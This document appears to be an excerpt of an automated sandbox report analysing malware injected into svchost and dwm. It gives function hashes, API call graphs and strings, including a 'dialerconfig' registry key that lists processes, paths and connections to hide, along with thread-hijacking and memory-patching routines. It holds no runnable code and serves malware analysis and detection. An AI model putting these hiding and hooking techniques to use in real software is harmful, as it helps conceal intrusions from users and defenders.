                                                                          • API String ID: 442123175-4171548499
                                                                          • Opcode ID: 769e155e8e03be1ef4aeb5f55e8b8ada6faf705201daec98c5fb8cb61498ce5a
                                                                          • Instruction ID: bf4803890842cdcd72fcab1033f968f229dce80172f82f9c58987f86f410db74
                                                                          • Opcode Fuzzy Hash: 769e155e8e03be1ef4aeb5f55e8b8ada6faf705201daec98c5fb8cb61498ce5a
                                                                          • Instruction Fuzzy Hash: 3741AF32715B8482EB219FA5E8547EAA7E2F798794F504021EE4D97B98EF3CC441CB50
                                                                          Function 00000195DD5C94A0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMONLIBRARYCODE
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000028.00000002.3281930657.00000195DD5C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000195DD5C0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_40_2_195dd5c0000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: ExceptionFileHeaderRaise
                                                                          • String ID: csm
                                                                          • API String ID: 2573137834-1018135373
                                                                          • Opcode ID: 596d8aa0106168f831d5a6617a756b303fb26e5894bac8705379b132699e985d
                                                                          • Instruction ID: d9ae04a037fab9593d23b185716cfc6ae1853ea009b9f3fd067145c53b8789b8
                                                                          • Opcode Fuzzy Hash: 596d8aa0106168f831d5a6617a756b303fb26e5894bac8705379b132699e985d
                                                                          • Instruction Fuzzy Hash: 63116A36205F8482EB228F19F450399B7E2FB88B95F584221EE8C57B68DF3CC552CB00
                                                                          Function 00000195DD597356 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 18COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000028.00000002.3281796722.00000195DD590000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000195DD590000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_40_2_195dd590000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: __std_exception_copy
                                                                          • String ID: ierarchy Descriptor'$riptor at (
                                                                          • API String ID: 592178966-758928094
                                                                          • Opcode ID: 13d46e236c22f038e3183f277bc937bc0c01c293d14bd07e4c5c2ea041926035
                                                                          • Instruction ID: 9d65062051ba8b6632479c62e9aac4e80b8205db58c6d08c9f87c8cd4192a069
                                                                          • Opcode Fuzzy Hash: 13d46e236c22f038e3183f277bc937bc0c01c293d14bd07e4c5c2ea041926035
                                                                          • Instruction Fuzzy Hash: E9E08671640F44D4DF028F61E8502D833E1DB58B64F889122995C1A311FA3CD1E9C301
                                                                          Function 00000195DD5973B4 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 17COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000028.00000002.3281796722.00000195DD590000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000195DD590000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_40_2_195dd590000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: __std_exception_copy
                                                                          • String ID: Locator'$riptor at (
                                                                          • API String ID: 592178966-4215709766
                                                                          • Opcode ID: af0f0512ca75cd806a30771dd11e2a0f17b9e6725b3a9df23089972a8cb9d3f7
                                                                          • Instruction ID: 73069449200712f0ed9716194b398ac1fb7d2be99278163e9f3c6fe5041c0d1b
                                                                          • Opcode Fuzzy Hash: af0f0512ca75cd806a30771dd11e2a0f17b9e6725b3a9df23089972a8cb9d3f7
                                                                          • Instruction Fuzzy Hash: 23E08671600F44D4DF028F61E4501D873E1E758B54F889122D94C1A311EA3CD1E5C300
                                                                          Function 00000195DD5C1BF4 Relevance: 5.1, APIs: 4, Instructions: 52memoryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000028.00000002.3281930657.00000195DD5C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000195DD5C0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_40_2_195dd5c0000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: Heap$Process$AllocFree
                                                                          • String ID:
                                                                          • API String ID: 756756679-0
                                                                          • Opcode ID: e6b128499454e36a5cfdb4ce6de946333e896a2fc86765bea62df52d9c8f7d1a
                                                                          • Instruction ID: c6ff0b059641438406dd073903249133c4bef50443ea073ae8eca436ca04cd8d
                                                                          • Opcode Fuzzy Hash: e6b128499454e36a5cfdb4ce6de946333e896a2fc86765bea62df52d9c8f7d1a
                                                                          • Instruction Fuzzy Hash: 96115135612F4881EB56DBEAE4146A977E2FB89FC0F184024DE4DA7B65DF38C452D340
                                                                          Function 00000195DD5C1268 Relevance: 5.0, APIs: 4, Instructions: 21memoryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000028.00000002.3281930657.00000195DD5C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000195DD5C0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_40_2_195dd5c0000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: Heap$AllocProcess
                                                                          • String ID:
                                                                          • API String ID: 1617791916-0
                                                                          • Opcode ID: baed807eea30b690d22ace55785552a5eee2cb9bee48e50401e6fb7d80347597
                                                                          • Instruction ID: 2cb59b5cb5821d9a8e55ce1da8b0343498eb188679990e79d0fc3b99dd601316
                                                                          • Opcode Fuzzy Hash: baed807eea30b690d22ace55785552a5eee2cb9bee48e50401e6fb7d80347597
                                                                          • Instruction Fuzzy Hash: 63E09235601A0886EB058FE2D82838A36E2FB8DF06F04C024C90907751DF7D84DAC760

                                                                          Execution Graph

                                                                          Execution Coverage:1.7%
                                                                          Dynamic/Decrypted Code Coverage:95.6%
                                                                          Signature Coverage:0%
                                                                          Total number of Nodes:135
                                                                          Total number of Limit Nodes:16
                                                                          execution_graph 14884 1160ca41abc 14890 1160ca41628 GetProcessHeap 14884->14890 14886 1160ca41ad2 Sleep SleepEx 14888 1160ca41acb 14886->14888 14888->14886 14889 1160ca41598 StrCmpIW StrCmpW 14888->14889 14935 1160ca418b4 14888->14935 14889->14888 14891 1160ca41648 _invalid_parameter_noinfo 14890->14891 14952 1160ca41268 GetProcessHeap 14891->14952 14893 1160ca41650 14894 1160ca41268 2 API calls 14893->14894 14895 1160ca41661 14894->14895 14896 1160ca41268 2 API calls 14895->14896 14897 1160ca4166a 14896->14897 14898 1160ca41268 2 API calls 14897->14898 14899 1160ca41673 14898->14899 14900 1160ca4168e RegOpenKeyExW 14899->14900 14901 1160ca418a6 14900->14901 14902 1160ca416c0 RegOpenKeyExW 14900->14902 14901->14888 14903 1160ca416e9 14902->14903 14904 1160ca416ff RegOpenKeyExW 14902->14904 14963 1160ca412bc RegQueryInfoKeyW 14903->14963 14905 1160ca4173a RegOpenKeyExW 14904->14905 14906 1160ca41723 14904->14906 14909 1160ca41775 RegOpenKeyExW 14905->14909 14910 1160ca4175e 14905->14910 14956 1160ca4104c RegQueryInfoKeyW 14906->14956 14914 1160ca41799 14909->14914 14915 1160ca417b0 RegOpenKeyExW 14909->14915 14913 1160ca412bc 11 API calls 14910->14913 14911 1160ca416f5 RegCloseKey 14911->14904 14916 1160ca4176b RegCloseKey 14913->14916 14917 1160ca412bc 11 API calls 14914->14917 14918 1160ca417eb RegOpenKeyExW 14915->14918 14919 1160ca417d4 14915->14919 14916->14909 14922 1160ca417a6 RegCloseKey 14917->14922 14920 1160ca41826 RegOpenKeyExW 14918->14920 14921 1160ca4180f 14918->14921 14923 1160ca412bc 11 API calls 14919->14923 14925 1160ca4184a 14920->14925 14926 1160ca41861 RegOpenKeyExW 14920->14926 14924 1160ca4104c 4 API calls 14921->14924 14922->14915 14927 1160ca417e1 RegCloseKey 14923->14927 14928 1160ca4181c RegCloseKey 14924->14928 14929 1160ca4104c 4 API calls 14925->14929 14930 1160ca4189c RegCloseKey 14926->14930 14931 1160ca41885 14926->14931 14927->14918 14928->14920 14932 1160ca41857 RegCloseKey 14929->14932 14930->14901 14933 1160ca4104c 4 API calls 14931->14933 14932->14926 14934 1160ca41892 RegCloseKey 14933->14934 14934->14930 14980 1160ca414a4 14935->14980 14974 1160ca56168 14952->14974 14954 1160ca41283 GetProcessHeap 14955 1160ca412ae _invalid_parameter_noinfo 14954->14955 14955->14893 14957 1160ca411b5 RegCloseKey 14956->14957 14958 1160ca410bf 14956->14958 14957->14905 14958->14957 14959 1160ca410cf RegEnumValueW 14958->14959 14961 1160ca41125 _invalid_parameter_noinfo Concurrency::details::SchedulerProxy::DeleteThis 14959->14961 14960 1160ca4114e GetProcessHeap 14960->14961 14961->14957 14961->14959 14961->14960 14962 1160ca4116e GetProcessHeap 14961->14962 14962->14961 14964 1160ca41327 GetProcessHeap 14963->14964 14968 1160ca4148a Concurrency::details::SchedulerProxy::DeleteThis 14963->14968 14965 1160ca4133e _invalid_parameter_noinfo Concurrency::details::SchedulerProxy::DeleteThis 14964->14965 14966 1160ca41476 GetProcessHeap 14965->14966 14967 1160ca41352 RegEnumValueW 14965->14967 14970 1160ca413d3 GetProcessHeap 14965->14970 14971 1160ca4141e lstrlenW GetProcessHeap 14965->14971 14972 1160ca41443 StrCpyW 14965->14972 14973 1160ca413f3 GetProcessHeap 14965->14973 14975 1160ca4152c 14965->14975 14966->14968 14967->14965 14968->14911 14970->14965 14971->14965 14972->14965 14973->14965 14976 1160ca4157c 14975->14976 14979 1160ca41546 14975->14979 14976->14965 14977 1160ca4155d StrCmpIW 14977->14979 14978 1160ca41565 StrCmpW 14978->14979 14979->14976 14979->14977 14979->14978 14981 1160ca414e1 GetProcessHeap 14980->14981 14982 1160ca414c1 GetProcessHeap 14980->14982 14986 1160ca56180 14981->14986 14983 1160ca414da Concurrency::details::SchedulerProxy::DeleteThis 14982->14983 14983->14981 14983->14982 14987 1160ca56182 14986->14987 14988 1160ca4554d 14990 1160ca45554 14988->14990 14989 1160ca455bb 14990->14989 14991 1160ca45637 VirtualProtect 14990->14991 14992 1160ca45663 GetLastError 14991->14992 14993 1160ca45671 14991->14993 14992->14993 14994 1160ca428c8 14995 1160ca4290e 14994->14995 14996 1160ca42970 14995->14996 14998 1160ca43844 14995->14998 14999 1160ca43866 14998->14999 15000 1160ca43851 StrCmpNIW 14998->15000 14999->14995 15000->14999 15001 1160ca1273c 15002 1160ca1276a 15001->15002 15003 1160ca127c5 VirtualAlloc 15002->15003 15005 1160ca128d4 15002->15005 15003->15005 15006 1160ca127ec 15003->15006 15004 1160ca12858 LoadLibraryA 15004->15006 15006->15004 15006->15005 15007 1160ca43ab9 15008 1160ca43a06 15007->15008 15009 1160ca43a56 VirtualQuery 15008->15009 15010 1160ca43a70 15008->15010 15011 1160ca43a8a VirtualAlloc 15008->15011 15009->15008 15009->15010 15011->15010 15012 1160ca43abb GetLastError 15011->15012 15012->15008 15013 1160ca45cf0 15014 1160ca45cfd 15013->15014 15015 1160ca45d09 15014->15015 15023 1160ca45e1a 15014->15023 15016 1160ca45d3e 15015->15016 15017 1160ca45d8d 15015->15017 15018 1160ca45d66 SetThreadContext 15016->15018 15018->15017 15019 1160ca45e41 VirtualProtect FlushInstructionCache 15019->15023 15020 1160ca45f1e 15031 1160ca44df0 GetCurrentProcess 15020->15031 15021 1160ca45efe 15021->15020 15035 1160ca443e0 15021->15035 15023->15019 15023->15021 15025 1160ca45f23 15026 1160ca45f77 15025->15026 15027 1160ca45f37 ResumeThread 15025->15027 15039 1160ca47940 15026->15039 15028 1160ca45f6b 15027->15028 15028->15025 15030 1160ca45fbf 15032 1160ca44e0c 15031->15032 15033 1160ca44e22 VirtualProtect FlushInstructionCache 15032->15033 15034 1160ca44e53 15032->15034 15033->15032 15034->15025 15037 1160ca443fc 15035->15037 15036 1160ca4445f 15036->15020 15037->15036 15038 1160ca44412 VirtualFree 15037->15038 15038->15037 15040 1160ca47949 15039->15040 15041 1160ca47954 15040->15041 15042 1160ca4812c IsProcessorFeaturePresent 15040->15042 15041->15030 15043 1160ca48144 15042->15043 15046 1160ca48320 RtlCaptureContext 15043->15046 15045 1160ca48157 15045->15030 15047 1160ca4833a RtlLookupFunctionEntry 15046->15047 15048 1160ca48389 15047->15048 15049 1160ca48350 capture_current_context 15047->15049 15048->15045 15049->15047 15049->15048

                                                                          Executed Functions

                                                                          Function 000001160CA41628 Relevance: 50.9, APIs: 20, Strings: 9, Instructions: 157registrymemoryCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000029.00000002.3316848167.000001160CA40000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001160CA40000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_41_2_1160ca40000_dwm.jbxd
                                                                          Similarity
                                                                          • API ID: Heap$CloseOpen$Process$Alloc$EnumFreeInfoQueryValuelstrlen
                                                                          • String ID: SOFTWARE\dialerconfig$paths$pid$process_names$service_names$startup$tcp_local$tcp_remote$udp
                                                                          • API String ID: 106492572-2879589442
                                                                          • Opcode ID: 29d8c56dd48d9a3b38e8b79419d4f3e68f34e96909367841420a970a2341c6d0
                                                                          • Instruction ID: 6161e3e51d841b3d053d37747076618646d68d4b7c54ebfdfb68af91052e3cd0
                                                                          • Opcode Fuzzy Hash: 29d8c56dd48d9a3b38e8b79419d4f3e68f34e96909367841420a970a2341c6d0
                                                                          • Instruction Fuzzy Hash: 4371D576610B1086EB149F65E8906DD23A4FB88B99F809161FF4E97B6DEF3AC4C4C740
                                                                          Function 000001160CA43790 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 44COMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000029.00000002.3316848167.000001160CA40000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001160CA40000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_41_2_1160ca40000_dwm.jbxd
                                                                          Similarity
                                                                          • API ID: CurrentProcessProtectVirtual$HandleModule
                                                                          • String ID: wr
                                                                          • API String ID: 1092925422-2678910430
                                                                          • Opcode ID: d5ed198cecc284837a9554765ab7ffb778fa62629811cf0fe5ebc999f83bf42b
                                                                          • Instruction ID: cb49a6d8150499ea34a3f095df7715ccaf74ac4ae549242de21977aa6f21db4f
                                                                          • Opcode Fuzzy Hash: d5ed198cecc284837a9554765ab7ffb778fa62629811cf0fe5ebc999f83bf42b
                                                                          • Instruction Fuzzy Hash: 9A115E36705B4183EF589B21F4082E9A2A0F78CB95F4440A9FF8907768EF3EC585C704
                                                                          Function 000001160CA45B30 Relevance: 9.2, APIs: 6, Instructions: 240threadCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 59 1160ca45b30-1160ca45b57 60 1160ca45b6b-1160ca45b76 GetCurrentThreadId 59->60 61 1160ca45b59-1160ca45b68 59->61 62 1160ca45b78-1160ca45b7d 60->62 63 1160ca45b82-1160ca45b89 60->63 61->60 64 1160ca45faf-1160ca45fc6 call 1160ca47940 62->64 65 1160ca45b9b-1160ca45baf 63->65 66 1160ca45b8b-1160ca45b96 call 1160ca45960 63->66 69 1160ca45bbe-1160ca45bc4 65->69 66->64 72 1160ca45bca-1160ca45bd3 69->72 73 1160ca45c95-1160ca45cb6 69->73 75 1160ca45c1a-1160ca45c8d call 1160ca44510 call 1160ca444b0 call 1160ca44470 72->75 76 1160ca45bd5-1160ca45c18 call 1160ca485c0 72->76 78 1160ca45cbc-1160ca45cdc GetThreadContext 73->78 79 1160ca45e1f-1160ca45e30 call 1160ca474bf 73->79 89 1160ca45c90 75->89 76->89 82 1160ca45e1a 78->82 83 1160ca45ce2-1160ca45d03 78->83 93 1160ca45e35-1160ca45e3b 79->93 82->79 83->82 92 1160ca45d09-1160ca45d12 83->92 89->69 97 1160ca45d92-1160ca45da3 92->97 98 1160ca45d14-1160ca45d25 92->98 94 1160ca45efe-1160ca45f0e 93->94 95 1160ca45e41-1160ca45e98 VirtualProtect FlushInstructionCache 93->95 104 1160ca45f1e-1160ca45f2a call 1160ca44df0 94->104 105 1160ca45f10-1160ca45f17 94->105 99 1160ca45e9a-1160ca45ea4 95->99 100 1160ca45ec9-1160ca45ef9 call 1160ca478ac 95->100 101 1160ca45e15 97->101 102 1160ca45da5-1160ca45dc3 97->102 106 1160ca45d8d 98->106 107 1160ca45d27-1160ca45d3c 98->107 99->100 108 1160ca45ea6-1160ca45ec1 call 1160ca44390 99->108 100->93 102->101 109 1160ca45dc5-1160ca45e10 call 1160ca43900 call 1160ca474dd 102->109 123 1160ca45f2f-1160ca45f35 104->123 105->104 111 1160ca45f19 call 1160ca443e0 105->111 106->101 107->106 113 1160ca45d3e-1160ca45d88 call 1160ca43970 SetThreadContext 107->113 108->100 109->101 111->104 113->106 124 1160ca45f77-1160ca45f95 123->124 125 1160ca45f37-1160ca45f75 ResumeThread call 1160ca478ac 123->125 128 1160ca45f97-1160ca45fa6 124->128 129 1160ca45fa9 124->129 125->123 128->129 129->64
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000029.00000002.3316848167.000001160CA40000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001160CA40000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_41_2_1160ca40000_dwm.jbxd
                                                                          Similarity
                                                                          • API ID: Thread$Current$Context
                                                                          • String ID:
                                                                          • API String ID: 1666949209-0
                                                                          • Opcode ID: 2a6939216e4066241bb7d33e143ff6fb32862c5ead5fedc71a002d9303c09c17
                                                                          • Instruction ID: 8692bfab2a7213d6ae5d3640dfdc91a5e4d399c362645174dc3f24ccf36dcf03
                                                                          • Opcode Fuzzy Hash: 2a6939216e4066241bb7d33e143ff6fb32862c5ead5fedc71a002d9303c09c17
                                                                          • Instruction Fuzzy Hash: 41D17576609B8886DA749B0AE49439A7BA0F7CCB84F100156EF8D47BA9DF3DC591CB40
                                                                          Function 000001160CA450D0 Relevance: 7.8, APIs: 5, Instructions: 318threadCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 131 1160ca450d0-1160ca450fc 132 1160ca4510d-1160ca45116 131->132 133 1160ca450fe-1160ca45106 131->133 134 1160ca45127-1160ca45130 132->134 135 1160ca45118-1160ca45120 132->135 133->132 136 1160ca45132-1160ca4513a 134->136 137 1160ca45141-1160ca4514a 134->137 135->134 136->137 138 1160ca4514c-1160ca45151 137->138 139 1160ca45156-1160ca45161 GetCurrentThreadId 137->139 140 1160ca456d3-1160ca456da 138->140 141 1160ca4516d-1160ca45174 139->141 142 1160ca45163-1160ca45168 139->142 143 1160ca45176-1160ca4517c 141->143 144 1160ca45181-1160ca4518a 141->144 142->140 143->140 145 1160ca4518c-1160ca45191 144->145 146 1160ca45196-1160ca451a2 144->146 145->140 147 1160ca451a4-1160ca451c9 146->147 148 1160ca451ce-1160ca45225 call 1160ca456e0 * 2 146->148 147->140 153 1160ca4523a-1160ca45243 148->153 154 1160ca45227-1160ca4522e 148->154 157 1160ca45255-1160ca4525e 153->157 158 1160ca45245-1160ca45252 153->158 155 1160ca45236 154->155 156 1160ca45230 154->156 160 1160ca452a6-1160ca452aa 155->160 159 1160ca452b0-1160ca452b6 156->159 161 1160ca45273-1160ca45298 call 1160ca47870 157->161 162 1160ca45260-1160ca45270 157->162 158->157 163 1160ca452b8-1160ca452d4 call 1160ca44390 159->163 164 1160ca452e5-1160ca452eb 159->164 160->159 170 1160ca4532d-1160ca45342 call 1160ca43cc0 161->170 171 1160ca4529e 161->171 162->161 163->164 174 1160ca452d6-1160ca452de 163->174 167 1160ca452ed-1160ca4530c call 1160ca478ac 164->167 168 1160ca45315-1160ca45328 164->168 167->168 168->140 178 1160ca45344-1160ca4534c 170->178 179 1160ca45351-1160ca4535a 170->179 171->160 174->164 178->160 180 1160ca4536c-1160ca453ba call 1160ca48c60 179->180 181 1160ca4535c-1160ca45369 179->181 184 1160ca453c2-1160ca453ca 180->184 181->180 185 1160ca454d7-1160ca454df 184->185 186 1160ca453d0-1160ca454bb call 1160ca47440 184->186 187 1160ca45523-1160ca4552b 185->187 188 1160ca454e1-1160ca454f4 call 1160ca44590 185->188 198 1160ca454bd 186->198 199 1160ca454bf-1160ca454ce call 1160ca44060 186->199 191 1160ca4552d-1160ca45535 187->191 192 1160ca45537-1160ca45546 187->192 200 1160ca454f6 188->200 201 1160ca454f8-1160ca45521 188->201 191->192 195 1160ca45554-1160ca45561 191->195 196 1160ca45548 192->196 197 1160ca4554f 192->197 203 1160ca45563 195->203 204 1160ca45564-1160ca455b9 call 1160ca485c0 195->204 196->197 197->195 198->185 208 1160ca454d2 199->208 209 1160ca454d0 199->209 200->187 201->185 203->204 210 1160ca455bb-1160ca455c3 204->210 211 1160ca455c8-1160ca45661 call 1160ca44510 call 1160ca44470 VirtualProtect 204->211 208->184 209->185 216 1160ca45663-1160ca45668 GetLastError 211->216 217 1160ca45671-1160ca456d1 211->217 216->217 217->140
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000029.00000002.3316848167.000001160CA40000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001160CA40000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_41_2_1160ca40000_dwm.jbxd
                                                                          Similarity
                                                                          • API ID: CurrentThread
                                                                          • String ID:
                                                                          • API String ID: 2882836952-0
                                                                          • Opcode ID: ab42e8011698989dde6dd516e0bf8dfd7e718f101fabf5710552cbfe92ec9bd4
                                                                          • Instruction ID: f6878b2950e9d4e6303fdb8e4c2bad55c8f75ea4604128ba6006891f042fd13a
                                                                          • Opcode Fuzzy Hash: ab42e8011698989dde6dd516e0bf8dfd7e718f101fabf5710552cbfe92ec9bd4
                                                                          • Instruction Fuzzy Hash: C802A832619B8486EB64CB59E49479AB7A1F3C9794F104056FB8E87BA8DF7DC484CF00
                                                                          Function 000001160CA439E0 Relevance: 4.6, APIs: 3, Instructions: 64memoryCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000029.00000002.3316848167.000001160CA40000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001160CA40000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_41_2_1160ca40000_dwm.jbxd
                                                                          Similarity
                                                                          • API ID: Virtual$AllocQuery
                                                                          • String ID:
                                                                          • API String ID: 31662377-0
                                                                          • Opcode ID: ad31f8c641c3994e4c662b42b06090e17ab0b09933d29211a4965d6dca603ca4
                                                                          • Instruction ID: 2ccc16f67b6c6c133aba7930fb0b1123e8ec8f16d7647dfb28198065f3b13e43
                                                                          • Opcode Fuzzy Hash: ad31f8c641c3994e4c662b42b06090e17ab0b09933d29211a4965d6dca603ca4
                                                                          • Instruction Fuzzy Hash: 6131DC3225AB8885EE789A15E0553DE66A4F3CC784F500565BBCE46BACDF7FC5C08B04
                                                                          Function 000001160CA4328C Relevance: 4.5, APIs: 3, Instructions: 43threadCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000029.00000002.3316848167.000001160CA40000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001160CA40000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_41_2_1160ca40000_dwm.jbxd
                                                                          Similarity
                                                                          • API ID: Current$FileModuleNameProcessProtectThreadVirtual$CreateFindHandlePath
                                                                          • String ID:
                                                                          • API String ID: 1683269324-0
                                                                          • Opcode ID: c94412c55dcd243bcd3fbe265bea19663896af10ab27123b85acb7154d5eea14
                                                                          • Instruction ID: 94d573ebf81321ba0a41e2ff60e5daec1efd8109dd9d15dde734bfa4c82e53cf
                                                                          • Opcode Fuzzy Hash: c94412c55dcd243bcd3fbe265bea19663896af10ab27123b85acb7154d5eea14
                                                                          • Instruction Fuzzy Hash: BD11927161174186FF6C9B21F8493DA2395BBDC745F9082A4BF56816BDEF7BD0C48200
                                                                          Function 000001160CA44DF0 Relevance: 4.5, APIs: 3, Instructions: 23memoryCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000029.00000002.3316848167.000001160CA40000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001160CA40000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_41_2_1160ca40000_dwm.jbxd
                                                                          Similarity
                                                                          • API ID: CacheCurrentFlushInstructionProcessProtectVirtual
                                                                          • String ID:
                                                                          • API String ID: 3733156554-0
                                                                          • Opcode ID: 7a47e93f7e79f9067e4e2fc8604941f3a9ad20237d3497da51ea1a98359c40d4
                                                                          • Instruction ID: b82ecec3a8b0e105f91659d87c61f8a587773f5ff2df7cd8ef6e3d7e919a64c3
                                                                          • Opcode Fuzzy Hash: 7a47e93f7e79f9067e4e2fc8604941f3a9ad20237d3497da51ea1a98359c40d4
                                                                          • Instruction Fuzzy Hash: 31F01736218B4480D6349B05E4417DAABA0E3CCBD4F144151BF8D43B6DCF3EC6C08B00
                                                                          Function 000001160CA1273C Relevance: 3.2, APIs: 2, Instructions: 187memorylibraryCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 265 1160ca1273c-1160ca127a4 call 1160ca129d4 * 4 274 1160ca127aa-1160ca127ad 265->274 275 1160ca129b2 265->275 274->275 276 1160ca127b3-1160ca127b6 274->276 277 1160ca129b4-1160ca129d0 275->277 276->275 278 1160ca127bc-1160ca127bf 276->278 278->275 279 1160ca127c5-1160ca127e6 VirtualAlloc 278->279 279->275 280 1160ca127ec-1160ca1280c 279->280 281 1160ca12838-1160ca1283f 280->281 282 1160ca1280e-1160ca12836 280->282 283 1160ca128df-1160ca128e6 281->283 284 1160ca12845-1160ca12852 281->284 282->281 282->282 285 1160ca128ec-1160ca12901 283->285 286 1160ca12992-1160ca129b0 283->286 284->283 287 1160ca12858-1160ca1286a LoadLibraryA 284->287 285->286 288 1160ca12907 285->288 286->277 289 1160ca128ca-1160ca128d2 287->289 290 1160ca1286c-1160ca12878 287->290 294 1160ca1290d-1160ca12921 288->294 289->287 292 1160ca128d4-1160ca128d9 289->292 291 1160ca128c5-1160ca128c8 290->291 291->289 295 1160ca1287a-1160ca1287d 291->295 292->283 296 1160ca12923-1160ca12934 294->296 297 1160ca12982-1160ca1298c 294->297 298 1160ca128a7-1160ca128b7 295->298 299 1160ca1287f-1160ca128a5 295->299 301 1160ca12936-1160ca1293d 296->301 302 1160ca1293f-1160ca12943 296->302 297->286 297->294 305 1160ca128ba-1160ca128c1 298->305 299->305 306 1160ca12970-1160ca12980 301->306 303 1160ca1294d-1160ca12951 302->303 304 1160ca12945-1160ca1294b 302->304 307 1160ca12963-1160ca12967 303->307 308 1160ca12953-1160ca12961 303->308 304->306 305->291 306->296 306->297 307->306 310 1160ca12969-1160ca1296c 307->310 308->306 310->306
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000029.00000002.3316783010.000001160CA10000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001160CA10000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_41_2_1160ca10000_dwm.jbxd
                                                                          Similarity
                                                                          • API ID: AllocLibraryLoadVirtual
                                                                          • String ID:
                                                                          • API String ID: 3550616410-0
                                                                          • Opcode ID: 8c1c9448f3dd1088c887dafc1273d9eb4da1e6d2ce59199f574756fa2a1f07a1
                                                                          • Instruction ID: 49a3fc0d690aa98ce44f09e4a15faa2e81cecff9995125230278b8085bbda5de
                                                                          • Opcode Fuzzy Hash: 8c1c9448f3dd1088c887dafc1273d9eb4da1e6d2ce59199f574756fa2a1f07a1
                                                                          • Instruction Fuzzy Hash: DD610232B0179487DB58CF5D9100BEDB3A2FB58BA4F588261EF590778CDA39D892C700
                                                                          Function 000001160CA41ABC Relevance: 3.1, APIs: 2, Instructions: 68sleepCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          APIs
                                                                            • Part of subcall function 000001160CA41628: GetProcessHeap.KERNEL32 ref: 000001160CA41633
                                                                            • Part of subcall function 000001160CA41628: HeapAlloc.KERNEL32 ref: 000001160CA41642
                                                                            • Part of subcall function 000001160CA41628: RegOpenKeyExW.ADVAPI32 ref: 000001160CA416B2
                                                                            • Part of subcall function 000001160CA41628: RegOpenKeyExW.ADVAPI32 ref: 000001160CA416DF
                                                                            • Part of subcall function 000001160CA41628: RegCloseKey.ADVAPI32 ref: 000001160CA416F9
                                                                            • Part of subcall function 000001160CA41628: RegOpenKeyExW.ADVAPI32 ref: 000001160CA41719
                                                                            • Part of subcall function 000001160CA41628: RegCloseKey.ADVAPI32 ref: 000001160CA41734
                                                                            • Part of subcall function 000001160CA41628: RegOpenKeyExW.ADVAPI32 ref: 000001160CA41754
                                                                            • Part of subcall function 000001160CA41628: RegCloseKey.ADVAPI32 ref: 000001160CA4176F
                                                                            • Part of subcall function 000001160CA41628: RegOpenKeyExW.ADVAPI32 ref: 000001160CA4178F
